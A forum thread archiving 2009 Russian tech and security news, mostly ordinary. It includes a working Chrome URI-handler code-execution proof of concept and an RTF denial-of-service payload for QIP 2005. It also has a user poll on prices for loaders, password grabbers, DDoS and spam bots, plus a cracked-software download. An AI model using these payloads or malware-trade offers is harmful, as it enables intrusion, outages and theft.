Архив новостей (2004-2015 год)

Статус
Закрыто для дальнейших ответов.
Отслеживать
использование GPU для брута WiFi-сетей

wifi.gif


Из-за вычислительной мощности сегодняшних GPU, GPUs начинают использовать все больше и больше для того, чтобы помочь процессором с некоторыми вычислениями. Это концепция, лежащая в Nvidia CUDA, ATI, и в Apple OpenCL. Существует не много приложений использующих эту технологию, но их ряды постепенно растут.
Российская компания ElcomSoft недавно выпустила Elcomsoft Wireless Security Auditor 1.0 для брута без проводных сетей с помощю GPU.
[New$paN]
Elcomsoft Wireless Security Auditor 1.0- программа, эффективно использующая вычислительные мощности современных видеокарт для восстановления и аудита паролей в беспроводных сетях со скоростью, недостижимой обычными средствами. При использовании этой технологии наиболее ресурсоёмкие части программы выполняются на мощных суперскалярных процессорах, использующихся в современных видеокартах ATI и NVIDIA. Если в системе присутствуют одна или несколько карт последнего поколения (ATI HD series, NVIDIA GeForce 8, 9 or 200 series), аппаратное ускорение активизируется автоматически. Программа проверяет безопасность вашей беспроводной сети, пытаясь проникнуть в нее снаружи или изнутри. Работа этого средства никак не отражается на функционировании беспроводной сети, которую проверяет данная программа. Программа анализирует дамп сетевых сообщений и пытается восстановить сохраненные пароли WPA/WPA2-PSK.
:zns5: Скачать|Download 3.4 MB
 
PopcornTV BBK NP101S-сетевой медиаплеер
220045.jpg

По информации пресс-службы корпорации BBK Electronics, в феврале начнутся продажи сетевого медиаплеера со встроенным жестким диском на 500 Гб.

PopcornTV NP101S поддерживает практически все популярные медиаформаты и способен проигрывать видео высокого разрешения (1080p). Он не имеет оптического привода, зато оснащен встроенным адаптером Ethernet и может воспроизводить файлы из интернета (в частности, потоковое видео с популярных видеохостингов), домашней сети или с жесткого диска.

PopcornTV BBK NP101S

Благодаря встроенному BitTorrent-клиенту, гаджет работает и с файлообменными сетями. USB2.0-порт позволит загружать контент с внешних носителей, а медиасервер - осуществлять трансляцию через локальную сеть. Набор аудио- и видеоразъемов новинки стандартный: S-Video, компонентный и композитный выходы, интерфейс HDMI, а также аналоговый стереофонический и цифровой коаксиальный аудиовыходы.

Точная цена устройства пока неизвестна, но, по словам представителя пресс-службы, NP101S будет стоить около 10000 рублей.
 
Digital Security открывает сайт своего исследовательского центра DSec Research Group

cert.jpg


Cпециалисты DSec Research Group занимаются поиском и исследованием уязвимостей различных приложений и систем.
Digital Security - одна из ведущих российских консалтинговых компаний в области информационной безопасности. Digital Security более семи лет работает на рынке информационной безопасности на всей территории России, стран СНГ и Балтии. Все специалисты отдела аудита и аналитики имеют более чем пятилетний практический опыт выполнения работ в области ИБ, включая аудит на соответствие ISO 27001 и PCI DSS. Среди клиентов Digital Security такие компании, как: ТНК-BP, Альфа-Банк, РОСБАНК, холдинг «Металлоинвест» и многие другие.
[New$paN]
Результаты работы DSecRG используются специалистами отдела аудита Digital Security при анализе защищенности информационных систем с применением методики активного аудита, а также при проведении тестов на проникновение. Благодаря этому анализ защищенности становится значительно более полным и глубоким, а разрабатываемые специалистами Digital Security рекомендации по устранению найденных уязвимостей - более эффективными.
Информация о найденных специалистами DSecRG уязвимостях публикуется в списках рассылки SecurityFocus, портале Milw0rm.com, а теперь и на открывшемся сайте DSecRG в виде отчетов об уязвимостях (advisory) и исследований (whitepapers). Также на новом сайте доступны эксплоиты, актуальные статьи специалистов DSecRG и наиболее интересные новости в области информационной безопасности.
Илья Медведовский, директор Digital Security:
«Мы открыли исследовательский центр год назад. За это время специалисты DSecRG неоднократно получали благодарность от таких компаний, как Oracle, SAP, Alcatel и разработчиков таких известных продуктов, как OpenBSD и RUBY. В первый юбилей DSecRG мы решили сделать наше внутреннее подразделение публичным и открыли его сайт, на котором будут публиковаться все результаты исследовательской работы специалистов DSecRG».
 
Пожалуйста, обратите внимание, что пользователь заблокирован
logo.gif


У сервиса ICQ очередная смена протокола... :shit:
В связи с очередным изменением протокола ICQ компанией AOL невозможна работа по протоколу ICQ следующих версий QIP: QIP Infium 9020 и QIP 8080, а также остальных альтернативных клиентов и старых версий ICQ. Обновление будет выложено при первой возможности. Пользователи Jabber могут продолжать нормальное общение через QIP Infium
:excl: Видимо возможностей пока нет! :)

Важное сообщение для пользователей ICQ:
ICQ осуществляет поддержку только авторизованных версий программ:
ICQ Lite & icq6.5
Сервер ICQ не поддерживает неавторизованных или не относящихся к ICQ сервисов-подражателей и их аналогов, а так же не может гарантировать качество соединения и функционал программы.
Решили значит потихоньку конкурентов сливать... ;)
[New$paN]

УГЛУБЛЯЕМСЯ В ТЕМУ:
Итак, по просьбе Shoohurt рассказываю все известное нам (команде разработчиков Miranda IM) на данный момент о проделках AOL.

Сегодня, около 13.00 МСК почти все пользователи неофициальных клиентов после входа в сеть и загрузки контакт-листа получали от пользователя с UIN 1 сообщение о том, что используемая версия клиента не используется и неавторизованна. На официальном сайте прямо на главной появилось сообщение, гласящее о том, что отныне поддерживаются только официальные версии программ, которые вот прям тут и можно скачать.

Пользователи, которые уже находились в сети, никаких изменений не почувствовали и не были отключены от сервера. У тех, кто пытался подключиться в первые час-полтора это получалось с переменным успехом: это объясняется тем, что что сеть icq распределенная и состоит из множества серверов, и даже после входа вас могут перебросить на другой, и судя по всему изменения применялись на них по очереди.

Немного технических деталей. Процедура входа проходит вполне обычно: проходит инициализация протокола, отсылка capabilities, загрузка серверного контакт-листа и собственных данных. Примерно в это время и приходит сообщение от номера один, и после этого получить что-либо с сервера становится невозможно.

Решив, что сегодня повторилась ситуация 8-го декабря, когда клиенты перестали работать из-за того что во время логина идентифицировали себя как icq5.1 и более ранние версии, мы попробовали идентифицировать себя как icq6.5 последней модели. Это не принесло никаких результатов. Стало понятно, что в этот раз АОЛ пошел путем глубокой защиты ? видимо теперь уже стали учитываться отправляемые капсы (capabilities, информация о поддерживаемых клиентом фишках протокола). Действительно, подмена их набора на тот, что использует icq6 помогла, однако только на время первого входа ? если после этого переподключиться, то это уже не поможет. Судя по всему в последовательность входа и начальной инициализации внесли какие то изменения, при невыполнении которых клиент считается альтернативным. Разработчики QIP высказали предположение о том, что серверу нужен некий дополнительный ключ, который может как просто быть зашит в клиент, так и вычисляться на основе полученной от сервера информации. Они в настоящий момент тоже усиленно работают над поиском причины отказа клиента.

Надеюсь в течение ближайших суток ? двух мы найдем причину.

Кроме того хочу заметить интересный факт ? эти изменения затронули только жителей стран СНГ. Когда я связался с нашими разработчиками из Чехии и Германии они были слегка в недоумении ? у них все работало прекрасно. Кроме того мы успешно смогли подключиться с миранды, используя американский прокси-сервер, так что есть подозрения о том, что это целенаправленная травля разрабатываемых в России альтернативных мессенджеров.

UPD: Сейчас разработчик QIP, INF, поделился со мной мыслью о том, что все дело в используемом начальном значении идентификатора последовательности у отправляемых пакетов. Все неофициальные клиенты генерируют их случайным образом, и это может быть тот самый ключ. Основная проблема заключается в том чтобы узнать алгоритм его генерации.

Сейчас мной наблюдаются такие проблемы:
1) У ~84% опрошенным мной пользователей ICQ (на мобильных) подтвердили что "ася на сотиках СДОХЛА!" ))
2) Проблемы при подключении QIP Infinium, а точнее вылезала ошибка = "слишком дофига подключений...бла-бла-бла"... и я смог войти только по истечению часа...
3) Друзья внезапно вылетают в off-line не успев дописать сообщение )) и обратно не возвращаются... :unsure: вымераем потихоньку...

P.S. НО я сам пользуюсь QIP 2005... пока всё стабильно! =)

Всё... доклад окончен! :) Можете быть свободны...
 
тест-драйв Windows 7 — первые итоги
33erdpi.jpg

Начало 2009 года, помимо праздничных каникул, было ознаменовано началом публичного тестирования операционной системы Windows 7. Очередное детище Microsoft оказалось настолько долгожданным, что привело к «падению» сайта разработчика уже в первый день релиза. Отчасти ажиотажу способствовало и ограничение количества загрузок 2,5 миллионами экземпляров, — которое впоследствии было снято. Теперь до 24 января загрузить бета-версию новинки может любой пользователь Сети. Однако, прежде чем стартовать закачку, TechnoDrive предлагает читателям ознакомиться с первыми отзывами ростовских пользователей. Они оказались весьма разнообразными.
По мнению TechnoDrive бета-тестеров, внешне Windows 7 выглядит как хорошо усовершенствованная Vista. «В частности, к ней подходят драйвера "предшественницы" и нет знаменитых проблем с компьютерными играми. Кроме того, новинка работает ощутимо быстрее, даже на бюджетных нетбуках. А простота установки и красивый пользовательский интерфейс делают Windows 7 желанным приобретением еще до официального релиза».
Аналогичные отзывы высказываются и на общероссийских форумах, — где появление «операционки» вызвало значительный резонанс. Причем, пока впечатления от Windows 7 подразделяются на две категории: «понравилось» и «не пробовал». О каких-либо серьезных «глюках» и сложностях в работе не сообщается. Отчасти это связано с небольшим временем тестирования, но для Microsoft может являться поводом для оптимизма.
Кстати, среди нескольких десятков ростовских ИТ-специалистов, опрошенных TechnoDrive, бета-версию попробовали лишь 10%. Остальные пока остаются приверженцами других операционных систем — от MacOS и Windows XP до традиционно «оппозиционной» Linux.
Однако, как известно, лучше один раз увидеть. Тем более, что дистрибутив «пробника» доступен на сайте Microsoft до 24 января. Для его загрузки потребуется указать существующий Windows Live ID или бесплатно зарегистрироваться. В наличии имеются 32- и 64-битные версии на английском, немецком, японском и арабском языках. Использовать их можно до 1 августа.
Что касается сроков выхода коммерческой версии Windows 7, то по словам представителей Microsoft, говорить об этом еще преждевременно. Скорее всего, официальный релиз состоится не раньше конца нынешнего года.
Обсуждение в этой теме !
 
Жесткий диск Lenovo ThinkPad с собственной клавиатурой.

Компания Lenovo выпустила внешний жёсткий диск ThinkPad USB Portable Secure Hard Drive. Особенностью его является наличие собственной мини-клавиатуры для ввода пароля (пин-кода) для получения доступа к информации.

Новинка поддерживает 128-битный стандарт шифрования AES, что позволяет надежно защищать данные. Шифрование в реальном времени позволяет пользователям избежать задержек доступа к данным, которые обычно присущи другим винчестерам с поддержкой шифрования. С одним жестким диском может работать до 10 уникальных пользователей и один администратор.

23-8.jpg


Компактная, легкая, простая в обращении новинка позволяет пользователю надежно защитить важные данные. HDD доступен в двух вариантах — емкостью 160 и 320 ГБ. Толщиной менее 2,5 см и размерами приблизительно 7,5 х 12 см, накопитель настолько мал, что может с легкостью поместиться в нагрудном кармане рубашки.

Это делает диск оптимальным устройством для пользователей, работающих вне офиса или вынужденных делить рабочее место с другими сотрудниками. Автономное питание избавляет пользователей от проблем с подключением к электрической сети, а удобный встроенный USB-кабель максимально облегчает процесс передачи информации.

Стоимость:
160 ГБ = $179
320 ГБ = $219.
 
Создание мобильных SMS-троянцев становится международным бизнесом

b6e138eabdce.jpg


На прошлой неделе был обнаружена новая вредоносная программа для операционной системы Symbian, нацеленную на клиентов одного из индонезийских мобильных операторов. Найденное вредоносное ПО относится к классу троянских программ и написано на скриптовом языке Python. Троянец без ведома владельцев телефонных номеров отправляет SMS-сообщения на короткий сервисный номер с командой перевести часть средств абонента на другой счет, принадлежащий злоумышленнику.

До недавнего времени случаи распространения вредоносного мобильного ПО, осуществляющего несанкционированную отправку SMS-сообщений, были зафиксированы лишь в России, но теперь эта "радость" появилась и в Индонезии.

Индонезийский троянец имеет пять известных вариаций: Trojan-SMS.Python.Flocker.ab-af. Программа настроена так, что средства с зараженного номера переводятся небольшими частями, от 45 до 90 центов США. Таким образом, в случае, если злоумышленникам удастся инфицировать большое количество телефонов, сумма, которую они получат на мобильный счет, может оказаться значительной.

С высокой степенью вероятности можно говорить о том, что в скором будущем проблема незаконных операций по счетам абонентов сотовой связи в мобильной вирусной индустрии будет приобретать все большую актуальность, постепенно расширяя географию своего присутствия.

Пользователи Kaspersky Mobile Security защищены от нового троянца: продукт «Лаборатории Касперского» блокирует все вредоносные программы, запрещая их исполнение в системе. «Лаборатория Касперского» рекомендует проявлять осторожность при работе с интернетом при помощи смартфонов и следить за актуальностью антивирусных баз защитных решений.
:lol: Вот и выбирайте что вам больше по душе... купить Kaspersky Mobile Security за 720 руб. на 1 год, либо 14-30 руб. отдать "трояну". Рэкит блин! B)
:rolleyes: ну все же знают что тут у нас все с "лицензией" сидят!
 
Разработан метод проведения скрытой атаки на Mac Os X
mac_os_x_leopard_stacks-171007.jpg

Студент миланского политеха Винченцо Иоццо (Vincenzo Iozzo) обнаружил возможность проведения скрытой атаки на компьютеры, работающие под управлением Mac OS X. Разработанный им метод, будучи взят на вооружение злоумышленниками, сделает очень сложным сбор улик для доказательства взлома.
Иоццо потратил массу времени на изучение работы OS X с исполняемыми файлами формата Mach-O и сумел найти обходной путь для загрузки бинарного кода в оперативную память. Оказалось, что встроенная защита от атак, состоящая в случайном расположении исполняемого кода в памяти компьютера, уязвима, поскольку системный загрузчик динамических библиотек всегда расположен по одному и тому же адресу.
"Дыра" теоретически позволяет злоумышленнику запустить бинарный код не в отдельном процессе, как это делается при большинстве современных кибератак, а непосредственно в процессе атакуемого приложения. Это значит, что вредоносному коду нет необходимости обращаться к жёсткому диску компьютера, и следов поражения здесь не остается. Обнаружить заражение можно другими способами, которые, правда, не являются традиционными в судебной практике.
Метод Иоццо — это не способ взлома системы, а лишь способ сделать его незаметным. То есть злоумышленникам придётся использовать его совместно с другими вредоносными программами, которые умеют проникать в Mac OS X благодаря неизвестным или же непропатченным уязвимостям.
Иоццо собирается представить свою находку на очередной конференции по кибербезопасности Black Hat, которая пройдёт в следующем месяце в Вашингтоне. Иоццо поделился методом с известным специалистом в этой области Чарльзом Миллером (Charles Miller), который сумел оценить его по достоинству, отметив, что использование данного метода злоумышленниками — всего лишь вопрос времени.
"Его очень легко использовать, — говорит он. — Будь я плохим парнем, я бы его использовал. Если вы заинтересованы в том, чтобы скрывать свои действия, было бы глупо его не использовать".
Также Миллер признался, что в настоящий момент работает над адаптацией данного метода для iPhone
 
В пиратской Apple iWork 09 нашли троян
iWorkBackground.jpg

Разработчик фаерволов и антивирусного ПО компания Intego призвала всех пользователей Mac не скачивать инсталляторы Apple iWork '09 с сайтов, предлагающих пиратскую продукцию. В Intego предупреждают, что риск заражения весьма высок, а его последствия могут быть самыми серьезными. По сведениям Intego, по крайней мере 20 000 человек уже успели скачать опасный дистрибутив.
Троян OSX.Trojan.iServices.A был обнаружен компанией 21 января этого года. Угроза, которую он представляет, классифицируется Intego как "серьезная".
Пиратская iWork '09 сейчас доступна через файлообменные сети BitTorrent и различные сайты с варезом. Хакерская iWork '09 полностью функциональна, однако содержит дополнительный компонент iWorkServices.pkg, который устанавливает троян одновременно с работой основного установщика.
Троян устанавливает себя в каталог автозапуска (/System/Library/StartupItems/iWorkServices) с правами чтения и записи в root. После этого программа соединяется с удаленным сервером, уведомляя хакера о своей установке и давая ему возможность соединяться с зараженной машиной и удаленно выполнять на ней различные действия. Кроме этого, троян способен загружать на инфицированный Mac и другие вредоносные приложения.
 
Новый вариант Mac Trojan Horse iServices найден в пиратской Adobe Photoshop CS4

Название: OSX.Trojan.iServices.B Trojan Horse

Обнаружен: Январь 25, 2009

Риск: Серьезный

Описание: Intego обнаружила новый вариант троянского коня iServices, обнаружила 22 января 2009года. Эта новая троянская программа, "OSX.Trojan.iServices.B", как и предыдущие версии (iWork), был найден на пиратских обменниках программного обеспечения типа BitTorrent трекеров, содержащие ссылки на пиратское программное обеспечение. Троянский конь находится вместе с копиями Adobe Photoshop CS4 для Mac. Фактическое Photoshop установочник чистый, но троянских конь находится в креке.

osX_trojan_iservices_b_01small.png


После загрузки этой версии Photoshop, пользователи будут запускать crack чтобы иметь возможность использовать его. Крэк сразу после запуска устанавливает бэкдор в / VAR / TMP /, каталог, который не удаляется при перезагрузке компьютера. (Если пользователь запускает крэк снова, троянский конь создает новый исполняемый файл под другим именем.)

Крэк запрашивает пароль администратора, запуска бэкдор с root привилегиями. Он копирует / USR / BIN / DivX, а затем запускает/System/Library/StartupItems/DivX. Таким образом троян проверяет, чтобы он был с root привилегиями, а затем сохраняет root хеш пароля в файл / VAR / root / .DivX. Он прослушивает случайные TCP-порты, запросы и ответы, такие, как GET / HTTP/1.0, послав 209-байт пакет, и делает неоднократные соединения двух IP-адресов.

Далее, crack открывает образ диска, который скрыт в ее ресурс-папке в папку с именем .data, и срабатывает сам крэк для Photoshop, позволяющий использовать его.

osX_trojan_iservices_b_02small.png


Троян подключается к удаленному серверу создателя этой вредоносной программы, предупреждающая что "я установлена", а после злоумышлинник имеет возможность подключиться к жертве и выполнять различные действия удаленно. Троянский конь также может загрузить дополнительные компоненты для инфицированных Mac.
 
Вышел KDE-4.2

ace3579f1ed3594c4577e604eec22db1.png

27 января, 2009. Сообщество KDE представило релиз KDE4. Кодовое имя "The Answer" (a.k.a KDE 4.2.0) - Свободный Десктоп готовый для конечного пользователя.
* Улучшения в интерфейсе Plasma позволяют упростить организацию рабочего места. Новыми возможностями Plasma можно назвать представление рабочего стола в виде просмотрщика файлов, неперекрываемость апплетов Plasma заставокой, возможности по группировке задач и инновационную систему уведомлений.
* Упрощение конфигурации менеджера окон KWin. Расширение возможностей представления окон. Различные виды переключения и предпросмотра окон.
* Интегрирование PowerDevil - мощного средства управления питанием. Улучшение интерфейса и интеграции в файловый менеджер Ark - архиватора.
* Дополнительные возможности в файловом менеджере Dolphin и диалогах открытия файлов: предпросмотр аудио, видео, текстовых документов и изображений. Миниатюры. Регулирование размера значков.
* Множественные улучшений в веб-браузере Konqueror: улучшенная поддержка стандартов(87% Acid3) и векторной графики. Переработанный диалог поиска.
* Расширенная поддержка скриптинга в виджетах Plasma. Теперь можно использовать языки JavaScript, Python и Ruby.

Пакеты доступны для дистрибутивов Gentoo(kde-testing), Kubuntu(8.10, 9.04), OpenSuSE(11.1, 11.0, 10.3) и Debian(sid/experimental).

Проблема с видеокартами nvidia исправлена в последних бета-версиях драйверов.

Поздравляю всех тех, кто ждал и помогал улучшить этот выпуск!

источник: linux.org.ru
 
Вышел MOPSLinux 6.2

1c45e176425cb1f24642b71c3f41dfed.png

MOPSLinux - это универсальный русскоязычный дистрибутив операционной системы Linux для серверов, рабочих станций и домашних компьютеров, созданный на базе Slackware Linux. По сравнению со Slackware Linux, дистрибутив MOPSLinux имеет ряд улучшений и дополнений. Так, переработана программа установки: процесс установки системы стал более простым и наглядным, многие процессы в нем автоматизированы.

В основе MOPSLinux 6.2 — Slackware Linux 12.2 доработанная программа установки системы, усовершенствованная система управления пакетами, два рабочих стола KDE3 и KDE4 (на выбор), 3D-эффекты compiz-fusion, новые элементы оформления и другие усовершенствования. Благодаря этому пользователи получат значительно улучшенную систему, отличающейся надёжностью, быстродействием и привлекательным дизайном рабочего стола.

В программе установки добавлены следующие возможности:

* простая (быстрая) и экспертная варианты установки
* установка системы по заранее подготовленным спискам пакетов
* обновления с предыдущих версий с использованием этих списков
* создание RAID-массивов
* установка на USB-диск
* установка проприетарных драйверов видеокарт Nvidia и ATI

Основные пакеты программ обновлены до следующих версий:

* ядро 2.6.27.9;
* графический сервер Xorg-server 1.4.2
* трехмерный рабочий стол compiz 0.7.8
* оконная среда KDE 3.5.10, 4.1.3
* офисные пакеты OpenOffice 3.0 Pro, KOffice 1.6.3
* браузер Mozilla Firefox 3.0.5
* клиент электронной почты Mozilla Thunderbird 2.0.0.19
* графические библиотеки QT 3.3.8b, QT 4.4.3, gtk+ 1.2.10, gtk+2 2.12.12
* система символьных вычислений Maxima с графическим интерфейсом wxMaxima
* серверы баз данных PostgreSQL 8.3.5 + contribs, MySQL 5.0.67

Официальный сайт
 
В .RU появился новый инстант-мессенджер, в котором текст заменили на рисунки, а главное окно превратили в телевизор - «Рисоваська». :)

moodbox.jpg


В программе пользователи могут устраивать рисованные чаты и креативные мозговые штурмы с друзьями, рисовать и постить комиксы, общаться в рисованных каналах-комьюнити. :crazy:
После скачивания и регистрации на экране появляется окошко-телевизор, в которое приходят сообщения-рисунки от друзей. Общаться можно, как в обычном мессенджере, с каждым другом по отдельности и через каналы.
Рисовать можно кистями, карандашом, аэрозолями, можно добавлять готовые рисунки – клипарты, а также перетаскивать в окошко рисования рисунки с компьютера и веб-браузера.
Программу разработала российская команда «Инструменты живого общения».

Рисоваська — это "аська", в которой рисуют с друзьями. Самый креативный инструмент общения на планете!

Главные инструменты - кисти, клипарты и картинки. Кистями ты можешь нарисовать всё что угодно и это будет выглядеть красиво! А картинки ты можешь перетаскивать отовсюду - из веб-браузера, с рабочего стола, из любого окна Рисоваськи.

Поставил се эту "штукню" :crazy: улыбнуло... в общем моя оценка 4++.
 
Вышла новая версия продукта DeviceLock 6.3, позволяющего предотвратить утечку данных из корпоративной сети, а также исключить вероятность проникновение в сеть вредоносных программ с портативных носителей.

te_86962.gif
DeviceLock 6.3 – управление доступом пользователей к сменным устройствам.

С помощью этого простого в эксплуатации инструмента сетевые администраторы смогут установить контроль над доступом пользователей к различным устройствам (включая флоппи-дисководы, серийные и параллельные порты локального ПК, приводы CD-ROM, носители FireWare и ZIP, «флэшки», сетевые принтеры, мобильные устройства и др.). DeviceLock 6.3 позволяет ограничить доступ к перечисленным устройствам для специфических групп пользователей, предоставлять доступ в режиме «только чтение», а также устанавливать правила подключения оборудования с учетом текущего времени суток или дня недели. Приложение может с успехом использоваться и в более сложных сценариях. К примеру, DeviceLock 6.3 способен распознавать конкретный носитель DVD/CD по уникальной цифровой подписи и разрешать чтение данных с диска даже в том случае, если пользователю запрещено пользоваться соответствующим приводом.

Для управления приложением необходимы права администратора, поэтому рядовые пользователи не смогут самостоятельно деактивировать службу DeviceLock Service или удалить соответствующее ПО со своего компьютера.

В предлагаемой версии программного продукта реализованы более совершенные механизмы управления доступом пользователей к мобильным устройствам на базе Palm OS. Администратор может разрешить передачу отдельных объектов (например, контактов, электронных писем или изображений) и осуществлять проверку файлов, копируемых с рабочей станции на КПК. В версии DeviceLock 6.3 также допускается создание временных белых списков (Temporary White List), которые позволяют служащим компании пользоваться конкретным устройством в рамках текущего сеанса работы. Программа может похвастаться расширенной поддержкой средств шифрования Windows 2000 TrueCrypt и PGP Whole Disk Encryption 9.8, а также более полной совместимостью с операционной системой Windows Vista SP1.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
6f602740aabdb35ca2615ed592e140d6.jpg

Google Chrome – браузер с открытым исходным кодом от компании Google, опять лицом в грязь. На этот раз очередное выполнение произвольного кода из-за недостаточной фильтрации параметра "chromehtml:"
Эксплойт был проверен на XP/Vista, IE6/7.

Код эксплойта:
[New$paN]
Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter :)
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

<html><head><title>Chrome URI Handler Remote Command Execution PoC</title></head>
<body>
<h3>This is a test</h3>
<iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0></iframe>
</body></html>

© По материалам www.securitylab.ru
 
Пожалуйста, обратите внимание, что пользователь заблокирован
poll-one.jpg
Вот задался я таким вопросом, а что сейчас есть на рынке?
Меня интересуют вот какие конкретные вопросы:
1. Какие продукты можно выделить? Что нового ещё не популярного, но внушающего доверия?
2. Какое на рынке финансовое состояние? Какие цены выставлены на продукты? Какие цены оптимальны для покупателей?
3. Чего не хватает на рынке? В какой области продукции чувствуется не "хорошего" софта? Какой на данный момент этап профессионализма разработчиков судя по продуктам на рынке?

И последний такой опрос, сколько вы готовы платить за хороший софт, приведите примеры цен на следующий софт:
- лаодер
- pwd-граббер
- связка
- ddos бот
- spam бот
пишите свои реальные цены только на тот софт что действительно вы бы купили, не стоит просто оценивать софт который вас не интересует, т.к. вы не знаете его предназначения->сложности разработки->реальной стоимости.
 
Box_DVD_Small.jpg
Утилита для работы с веб-камерами. Программа webcamXP позволяет предоставить доступ к вашей камере любому пользователю через Интернет, не устанавливая на компьютер специальное серверное программное обеспечение. Все необходимые программы встроены прямо в webcamXP, так что потребуется только настроить несколько параметров, таких, как: порт сервера и путь к локальной директории.
Кроме видеокартинки, сполучаемой с веб-камер, можно использовать видео, которое передаётся по локальной сети.
ОС: Windows 2000/XP/2003/Vista

w5_main.jpg


Домашняя страница
скачать с DepositFiles+Crack.
 
Уязвимость: QIP 2005 DoS.

1176378973_35.png

СПРАВКА:
QIP 2005 бесплатная программа с закрытым исходным кодом, альтернативный клиент мгновенного обмена сообщениями основана на протоколе OSCAR. Он имеет полную поддержку ICQ и экспериментальная поддержка AIM.

Оф.сайт:
www.qip.ru

УЯЗВИМЫЕ ВЕРСИИ:
QIP 2005 build 8082 (последняя версия)
Предыдущие версии также могут быть затронуты

ПОДРОБНОСТИ:
Злоумышленник может воспользоваться уязвимостью, отправив специально созданного сообщения в формате RTF. Сообщение может привести к "замораживанию" уязвимых приложений и использовать 100% CPU.
Пример:
{\rtf\pict\&&}
Возможно уязвимый код существует в TRichView компоненте, однако это не подтвердили.

ЭКСПЛУАТАЦИЯ:
Удаленный злоумышленник может воспользоваться этой уязвимостью с помощью любого программного обеспечения для обмена мгновенными сообщениями с OSCAR (ICQ) поддержка протокола, направив специально созданного сообщения в формате RTF.

Автор:
Максим Кулаков aka ShineShadow
 
Бесплатная лицензия для Acronis True Image 10 Personal Edition
Acronis_logo_and_slogan.png
Компания Acronis, которая выпускает специализированный софт для создания резервных копий данных, ПО по работе с жесткими дисками и прочие системные средства, решила сделать подарок и бесплатно раздает лицензионные ключи для «Acronis True Image 10 Personal Edition» (инфо).

Для его получения следует всего лишь пройти регистрацию по адресу: http://www.acronis.co.uk/mag/ati10pe ответить на подтверждающее письмо и через минуту вы получите заветный лицензионный ключ.

2029198_bigthumb.png


Дистрибутив: :zns5: Скачать|Download

В итоге у нас в распоряжении хорошая программа для резервного копирования данных абсолютно бесплатно и легально. И помните: «backup early, backup often»

источник: habrahabr.ru
 
Доступно седьмое обновление дистрибутива Debian GNU/Linux 4.0 (r7)

46f112fd9754422188152c46f4e806e0.jpg

Анонсирован выход обновленного релиза Debian GNU/Linux 4.0r7 (кодовое имя etch). В 37 пакетах устранены проблемы безопасности, в 4 пакетах отмечены незначительные изменения (в пакете glpi скрипт domxml-php5-php5.php заменен на LGPL версию, в glibc для Словакии и Словении указан символ валюты Евро, устранена проблеме сборки пакета tagcoll и пересобран fai-kernels).

Кроме того выпущен второй в этом году выпуск новостей проекта Debian. Некоторые интересные моменты:

* Подтверждены планы выпуска релиза Debian GNU/Linux 5.0 (Lenny) 14 февраля.
* Доступен отчет ( часть 1 , часть 2, часть 2.5 и часть 3) о работе проведенной в рамках программы Google Summer of Code 2008.
*Доступны результаты опроса на немецком портале Heise Open, на который ответили представители 1312 немецких компаний. 47% из опрошенных указали, что используют в качестве серверного дистрибутива Debian GNU/Linux (Ubuntu - 32%, SUSE Enterprise - 35%, OpenSUSE -2 9%, Red Hat - 15%). На десктопе Debian установлен у 29.9%, Ubuntu - 60.9%, OpenSUSE - 28.8%, SLED - 8.8%, Fedora - 8.2%, RHEL - 5.7%, CentOS - 3.5%.
* Представлен сервис DDPortfolio с подборкой ссылок о разработчиках Debian;
* Опубликована статистика по активности публикации сообщений в различных почтовых рассылках проекта;
 
Статус
Закрыто для дальнейших ответов.
Верх